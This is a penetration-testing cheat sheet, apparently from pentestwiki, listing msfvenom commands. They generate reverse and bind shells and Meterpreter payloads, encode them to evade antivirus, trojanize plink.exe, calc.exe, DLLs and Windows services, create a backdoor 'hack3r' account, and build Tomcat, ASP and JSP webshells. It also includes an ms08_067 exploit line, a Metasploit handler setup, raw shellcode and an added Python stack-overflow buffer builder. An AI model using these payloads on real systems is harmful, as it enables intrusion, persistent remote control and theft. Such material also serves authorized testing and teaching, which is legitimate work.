Msfvenom payloads

From pentestwiki.org

General commands

$msfvenom -l payloads


$msfvenom --help-formats


Payloads generation

Binary payloads

$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"


$msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f js_le -e generic/none


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe


$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe


$msfvenom -p windows/meterpreter/reverse_https LHOST=$LOCALIP LPORT=443 -f exe -o met_https_reverse.exe


$msfvenom -p windows/meterpreter/reverse_http LHOST=$LOCALIP LPORT=80 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/plink.exe -o /var/www/daaa118.exe


$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP -f exe -k -x calc.exe -o calc_2.exe


Staged payload (shell/reverse_tcp: the binary only carries a small stager that fetches the rest of the payload from a Metasploit handler, so it needs exploit/multi/handler rather than a plain nc listener)

$msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o staged.out -f elf-so


Non-staged payload (shell_reverse_tcp: the complete payload is in the binary, so a plain nc listener on LPORT is enough)

$msfvenom -p linux/x86/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -o non-staged.out -f elf-so


$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe


Warning: the template binary given with -x must not be UPX-compressed (or otherwise packed); msfvenom needs an unpacked PE to inject the payload into

$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -e x86/shikata_ga_nai -o plink-meterpreter.exe


$msfcli windows/smb/ms08_067_netapi RHOST=$IP PAYLOAD=windows/shell/bind_tcp E


$msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f py


Create an account:

$msfvenom -p windows/adduser -f exe -o account.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20


Trojanize DLL:

$msfvenom -p windows/exec CMD=calc.exe -f dll -o calc.dll


Trojanize Windows Service:

$msfvenom -p windows/exec CMD=calc.exe -f exe-service
$msfvenom -p windows/adduser -f exe-service -o service.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20


Get the shellcode's assembly (the bytes after the call at 0x18 are the string "whoami\0": the call jumps over them and leaves their address on the stack, so ndisasm decodes them as bogus instructions until int 0x80):

$msfvenom -p linux/x86/exec cmd=whoami R | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 42 bytes

00000000  6A0B              push byte +0xb
00000002  58                pop eax
00000003  99                cdq
00000004  52                push edx
00000005  66682D63          push word 0x632d
00000009  89E7              mov edi,esp
0000000B  682F736800        push dword 0x68732f
00000010  682F62696E        push dword 0x6e69622f
00000015  89E3              mov ebx,esp
00000017  52                push edx
00000018  E807000000        call 0x24
0000001D  7768              ja 0x87
0000001F  6F                outsd
00000020  61                popa
00000021  6D                insd
00000022  6900575389E1      imul eax,[eax],dword 0xe1895357
00000028  CD80              int 0x80

Get the shellcode as a \x-escaped string for embedding in a Python/Perl exploit:

$msfvenom -p linux/x86/exec cmd=whoami R | hexdump -v -e '"\\\x" 1/1 "%02x"'
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 42 bytes

\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80
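As an added example (not part of the pentestwiki page), the helpers below take the escaped shellcode above into a Python exploit: they parse it back to bytes, report which of the usual bad characters it contains (the unencoded exec payload has five null bytes, which is why the -b/-e options earlier on this page exist), recover the command string that sits after the call (the bytes ndisasm mis-decodes as ja/outsd/popa/insd), and lay the shellcode into a stack-overflow buffer. The offset 100, return address 0x41424344 and buffer size 256 in the usage call are made-up placeholders, not values from any real target.

```python
# Added example (not from the pentestwiki page): work with the raw
# linux/x86/exec shellcode shown above from a Python exploit.
import re

# The 42-byte linux/x86/exec cmd=whoami payload exactly as printed by the
# hexdump command on the page (no encoder, no bad-char filtering).
SHELLCODE_ESCAPED = (
    r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00"
    r"\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f"
    r"\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80"
)


def unescape(s: str) -> bytes:
    """Turn a "\\x6a\\x0b..." string back into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))


def escape(b: bytes) -> str:
    """Produce the same "\\x.." form the hexdump command on the page gives."""
    return "".join(f"\\x{c:02x}" for c in b)


def find_badchars(sc: bytes, bad: bytes) -> dict:
    """Map each bad byte that occurs in sc to the offsets where it appears.
    Any hit means the payload needs an encoder (msfvenom -e ... -b ...)."""
    hits = {}
    for c in bad:
        offs = [i for i, b in enumerate(sc) if b == c]
        if offs:
            hits[c] = offs
    return hits


def call_embedded_string(sc: bytes) -> bytes:
    """linux/x86/exec stores the command right after a 'call' (opcode E8):
    the call skips the string and leaves its address on the stack, which is
    why ndisasm shows bogus instructions between the call and int 0x80."""
    i = sc.index(0xE8)
    rel = int.from_bytes(sc[i + 1:i + 5], "little", signed=True)
    return sc[i + 5:i + 5 + rel].rstrip(b"\x00")


def build_buffer(sc: bytes, offset: int, ret: int, total: int, nops: int = 16) -> bytes:
    """Classic stack-overflow layout: padding up to the saved EIP, the return
    address (little-endian), a NOP sled, then the shellcode, padded to total."""
    body = b"A" * offset + ret.to_bytes(4, "little") + b"\x90" * nops + sc
    if len(body) > total:
        raise ValueError("shellcode does not fit in the buffer")
    return body + b"C" * (total - len(body))


if __name__ == "__main__":
    sc = unescape(SHELLCODE_ESCAPED)
    print(len(sc), "bytes; bad chars:", find_badchars(sc, b"\x00\x0a\x0d"))
    print("command:", call_embedded_string(sc))
    # Placeholder offset/return address/size; take the real ones from your crash analysis.
    print(escape(build_buffer(sc, 100, 0x41424344, 256))[:60], "...")
```

Running it prints the five null-byte offsets (15, 26, 27, 28 and 35), which is exactly what -b "\x00" would force shikata_ga_nai to remove, and recovers b'whoami' from the bytes that ndisasm showed as ja/outsd/popa/insd.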

Webshells

Tomcat webshell

$msfvenom -p java/meterpreter/reverse_tcp -f war -o tomcatapp.war LHOST=$LOCALIP


$msfvenom -p java/shell_reverse_tcp -f war -o tomcatapp2.war LHOST=$LOCALIP LPORT=442


ASP webshell

$msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f asp -o webshell_reverse_msfvenom.txt


JSP webshell

$msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o test.jsp -f jsp


-v <name>: sets the variable name used in the generated output (for example -f py -v shellcode). Very useful when replacing the payload in an existing exploit, since the new buffer drops in under the name the exploit already uses.

Using Metasploit: start a handler and wait for the reverse shell (PAYLOAD, LHOST and LPORT must match what msfvenom was given)

msf>use exploit/multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LPORT 443
msf>set LHOST $LOCALIP
msf>exploit